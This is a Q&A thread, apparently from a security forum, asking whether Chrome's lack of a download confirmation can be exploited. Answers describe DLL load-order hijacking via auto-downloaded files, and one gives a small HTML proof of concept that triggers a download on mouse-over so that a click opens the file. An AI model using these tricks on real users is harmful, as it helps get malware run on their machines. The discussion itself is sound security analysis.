Could Google Chrome's lack of a download confirmation dialog be a security vulnerability?

Question

Suppose the user is playing a game like flappy bird that requires constant tapping in the lower left area of the screen (where the downloaded file needs to be clicked).

Then while the user is playing the game a file is downloaded by the website and and then the user clicks on it because the user was playing the game and opens the file.

It could be an EXE file which could harm the system and infect it with malware.

Other browsers like Firefox have a prompt which stops this but Chrome doesn't and I think it is a security issue.

Answer 1

Yes, it can be a security vulnerability. To exploit it, consider the following scenario.

1. The attacker somehow convinces the user to visit a website under attackers control.
2. A DLL is automatically downloaded to the Downloads folder.
3. The user downloads a legit installer/setup/whatever to the Downloads folder.
4. It is possible that this software is vulnerable to DLL load order hijacking.
5. When the user starts the legitimate app, basically it will load the malicious DLL inside the Downloads folder instead of the legitimate one.

Fortunately, this is not a very probable scenario, as there are a lot of unknowns/ifs in this attack. Can the attacker guess what other legitimate files the user downloads? Is it possible hijack the DLLs in this software? Will the malicious DLL be blocked by Chrome download scan? But if the attacker is lucky, it is even possible to elevate privileges to admin because the installers usually start with admin privileges, and this valid UAC prompt is usually accepted by the users.

The originally proposed scenario is less likely I guess, as people don't usually start unknown executables from the Downloads folder. But some people will do for sure.

Answer 2

I' not sure if this can be really called a vulnerability ... However, this behaviour could be possilby be unwanted.

I would imagine a possible exploit like this:

• User is on a website
• Make the user click on a button on the left bottom on the screen (fix the position of the button so that it never changes its position on the screen)
• As soon as the user has the mouse over the button (onMouseOver) start the download of an executable file
• The Chrome Download bar pops up and the downloaded file is now where the button was
• If the user presses the mouse button, he might accidentally open the downloaded file instead (if it is already fully downloaded).

It depends on the operating system if there downloaded file is directly executed or if it presents another warning to the user.

I have built a short example. This assumes that download.example.com automatically starts a download. And if you are not very fast with clicking, then it works and you have just opened a (maybe malicious) file.

<html>
 <body>
  <button type="button"
    onMouseOver="window.location.assign('http://download.example.com/')"
    style="position: fixed; bottom: 1em; left: 1em;">Click Me!</button>
 </body>
</html>

The Firefox browser does prevent such attacks by default through adding a delay on the download button (see the question Is the save button delay in a Firefox download dialog a security feature?)

Answer 3

This is not a security issue in Chrome. This is more of a mistake a user can make.
In order for your "attack" to work you need the following steps:
1. Get a user to place your game
2. Download a file with out the user noticing
3. Get him to click close enough to the bottom download bar 4. Assume he made a mistake and clicked the downloaded file

The likely hood of this happening either way is very low. If it does happen it is 100% the users fault and not chromes.